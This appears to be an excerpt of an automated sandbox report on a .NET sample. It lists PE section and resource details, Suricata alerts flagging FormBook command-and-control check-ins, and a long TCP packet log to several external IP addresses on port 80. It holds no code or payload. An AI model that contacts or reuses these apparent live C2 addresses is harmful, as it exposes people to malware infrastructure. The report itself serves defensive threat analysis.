                                                                                                                                    .reloc0xe40000xc0x200a8f5d199a15aee7352f1c6d3a4a2d705False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                    Resources

                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                    RT_VERSION0xe20900x378data0.43243243243243246
                                                                                                                                    RT_MANIFEST0xe24180x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                    Imports

                                                                                                                                    DLLImport
                                                                                                                                    mscoree.dll_CorExeMain

                                                                                                                                    Network Behavior

                                                                                                                                    Suricata IDS Alerts

                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                    2025-01-10T19:46:21.171227+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449843172.247.112.16480TCP
                                                                                                                                    2025-01-10T19:46:49.387880+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45001213.248.169.4880TCP
                                                                                                                                    2025-01-10T19:47:23.511477+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450016156.253.8.11580TCP
                                                                                                                                    2025-01-10T19:47:36.864133+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45002037.97.254.2780TCP
                                                                                                                                    2025-01-10T19:47:51.047350+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450024199.193.6.13480TCP
                                                                                                                                    2025-01-10T19:48:18.386830+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450028124.6.61.13080TCP

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Jan 10, 2025 19:46:20.591202974 CET4984380192.168.2.4172.247.112.164
                                                                                                                                    Jan 10, 2025 19:46:20.596041918 CET8049843172.247.112.164192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:20.596216917 CET4984380192.168.2.4172.247.112.164
                                                                                                                                    Jan 10, 2025 19:46:20.606928110 CET4984380192.168.2.4172.247.112.164
                                                                                                                                    Jan 10, 2025 19:46:20.611690998 CET8049843172.247.112.164192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:21.127095938 CET8049843172.247.112.164192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:21.171226978 CET4984380192.168.2.4172.247.112.164
                                                                                                                                    Jan 10, 2025 19:46:21.175731897 CET8049843172.247.112.164192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:21.177223921 CET4984380192.168.2.4172.247.112.164
                                                                                                                                    Jan 10, 2025 19:46:21.178807974 CET4984380192.168.2.4172.247.112.164
                                                                                                                                    Jan 10, 2025 19:46:21.184982061 CET8049843172.247.112.164192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:41.267987967 CET4997080192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:41.272800922 CET804997013.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:41.272883892 CET4997080192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:41.286834002 CET4997080192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:41.291716099 CET804997013.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:41.772420883 CET804997013.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:41.772638083 CET804997013.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:41.772689104 CET4997080192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:42.796267033 CET4997080192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:43.815299988 CET4998780192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:43.820169926 CET804998713.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:43.820244074 CET4998780192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:43.835413933 CET4998780192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:43.840234995 CET804998713.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:45.343058109 CET4998780192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:45.391143084 CET804998713.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.362154007 CET5000380192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:46.367079973 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.367221117 CET5000380192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:46.381752968 CET5000380192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:46.386670113 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.386682987 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.386701107 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.386709929 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.386775017 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.386784077 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.386840105 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.386850119 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.386861086 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.859031916 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.860971928 CET805000313.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:46.861148119 CET5000380192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:47.211410046 CET804998713.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:47.211621046 CET4998780192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:47.889981031 CET5000380192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:48.909116030 CET5001280192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:48.914102077 CET805001213.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:48.914190054 CET5001280192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:48.924024105 CET5001280192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:48.928886890 CET805001213.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:49.387398958 CET805001213.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:49.387818098 CET805001213.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:49.387880087 CET5001280192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:49.390974045 CET5001280192.168.2.413.248.169.48
                                                                                                                                    Jan 10, 2025 19:46:49.395802021 CET805001213.248.169.48192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:54.448497057 CET5001380192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:54.453349113 CET8050013156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:54.453433990 CET5001380192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:54.468764067 CET5001380192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:54.473507881 CET8050013156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:55.983792067 CET5001380192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:56.036516905 CET8050013156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:57.002903938 CET5001480192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:57.007797003 CET8050014156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:57.007898092 CET5001480192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:57.022177935 CET5001480192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:57.026951075 CET8050014156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:58.530785084 CET5001480192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:58.579093933 CET8050014156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.549355030 CET5001580192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:59.554157019 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.554270029 CET5001580192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:59.568818092 CET5001580192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:46:59.573746920 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573760986 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573780060 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573788881 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573823929 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573844910 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573940039 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573950052 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:59.573957920 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:01.077581882 CET5001580192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:01.123063087 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:02.096750021 CET5001680192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:02.101634026 CET8050016156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:02.101691008 CET5001680192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:02.111824036 CET5001680192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:02.116734028 CET8050016156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:15.860539913 CET8050013156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:15.860662937 CET5001380192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:18.387823105 CET8050014156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:18.387875080 CET5001480192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:20.969266891 CET8050015156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:20.969325066 CET5001580192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:23.511208057 CET8050016156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:23.511476994 CET5001680192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:23.512360096 CET5001680192.168.2.4156.253.8.115
                                                                                                                                    Jan 10, 2025 19:47:23.517118931 CET8050016156.253.8.115192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:28.562661886 CET5001780192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:28.567498922 CET805001737.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:28.567641020 CET5001780192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:28.590451956 CET5001780192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:28.595230103 CET805001737.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:29.200200081 CET805001737.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:29.200392962 CET805001737.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:29.200468063 CET5001780192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:30.093199015 CET5001780192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:31.112135887 CET5001880192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:31.116966963 CET805001837.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:31.117050886 CET5001880192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:31.132036924 CET5001880192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:31.136858940 CET805001837.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:31.713006973 CET805001837.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:31.713177919 CET805001837.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:31.713232040 CET5001880192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:32.640192986 CET5001880192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:33.658607006 CET5001980192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:33.663491964 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.663593054 CET5001980192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:33.679908991 CET5001980192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:33.684874058 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.684905052 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.684952021 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.684973955 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.684993982 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.685014963 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.685036898 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.685090065 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:33.685111046 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:34.298815966 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:34.298896074 CET805001937.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:34.298940897 CET5001980192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:35.187066078 CET5001980192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.242249012 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.247169971 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.247267962 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.298125982 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.302997112 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.863960981 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864012957 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864026070 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864044905 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864063025 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864075899 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864089966 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864101887 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864115000 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864126921 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864132881 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.864172935 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.869106054 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.869121075 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.869134903 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.869146109 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.869240046 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.954593897 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.954626083 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.954663992 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.954678059 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.954701900 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.954785109 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.954952002 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.954965115 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.954977036 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.954988956 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.955002069 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.955019951 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.955048084 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.955631971 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.955672979 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.955732107 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.955744028 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.955759048 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.955770969 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.955785990 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.955786943 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.955827951 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.956588030 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.956638098 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.956644058 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.956665993 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.956680059 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.956692934 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.956711054 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.956723928 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.956743956 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.957593918 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.957607985 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.957619905 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.957662106 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.957662106 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:37.045147896 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045171022 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045183897 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045288086 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045308113 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:37.045310020 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045325041 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045339108 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045353889 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045429945 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:37.045855999 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045870066 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045885086 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045907021 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045921087 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045929909 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:37.045933008 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045948029 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045962095 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.045965910 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:37.045985937 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:37.046001911 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:37.046675920 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.046689034 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.046701908 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.046714067 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.046725988 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.046750069 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:37.046761036 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:37.047074080 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:37.047123909 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:37.050270081 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:37.055093050 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:42.477189064 CET5002180192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:42.481939077 CET8050021199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:42.482043028 CET5002180192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:42.496697903 CET5002180192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:42.501616955 CET8050021199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:43.079977989 CET8050021199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:43.080105066 CET8050021199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:43.080147028 CET5002180192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:43.999551058 CET5002180192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:45.058789015 CET5002280192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:45.063694000 CET8050022199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:45.063765049 CET5002280192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:45.103970051 CET5002280192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:45.109102011 CET8050022199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:45.670983076 CET8050022199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:45.671245098 CET8050022199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:45.671309948 CET5002280192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:46.608962059 CET5002280192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:47.728832960 CET5002380192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:47.733870029 CET8050023199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:47.733990908 CET5002380192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:47.839987993 CET5002380192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:47.844897032 CET8050023199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:47.844913006 CET8050023199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:47.844928980 CET8050023199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:47.844954967 CET8050023199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:47.844965935 CET8050023199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:47.844975948 CET8050023199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:47.844986916 CET8050023199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:47.845190048 CET8050023199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:47.845201015 CET8050023199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:48.409528017 CET8050023199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:48.409667969 CET8050023199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:48.409862041 CET5002380192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:49.358899117 CET5002380192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:50.429260015 CET5002480192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:50.451806068 CET8050024199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:50.451894999 CET5002480192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:50.488270998 CET5002480192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:50.519124031 CET8050024199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:51.047204971 CET8050024199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:51.047220945 CET8050024199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:51.047349930 CET5002480192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:51.051491022 CET5002480192.168.2.4199.193.6.134
                                                                                                                                    Jan 10, 2025 19:47:51.056401968 CET8050024199.193.6.134192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:08.589545012 CET5002580192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:08.594480038 CET8050025124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:08.594544888 CET5002580192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:08.609489918 CET5002580192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:08.614407063 CET8050025124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:10.124814034 CET5002580192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:10.129739046 CET8050025124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:10.129894972 CET5002580192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:11.143507004 CET5002680192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:11.148370028 CET8050026124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:11.148477077 CET5002680192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:11.163376093 CET5002680192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:11.168170929 CET8050026124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:12.671370029 CET5002680192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:12.676372051 CET8050026124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:12.676455021 CET5002680192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:13.693530083 CET5002780192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:13.698365927 CET8050027124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:13.698479891 CET5002780192.168.2.4124.6.61.130
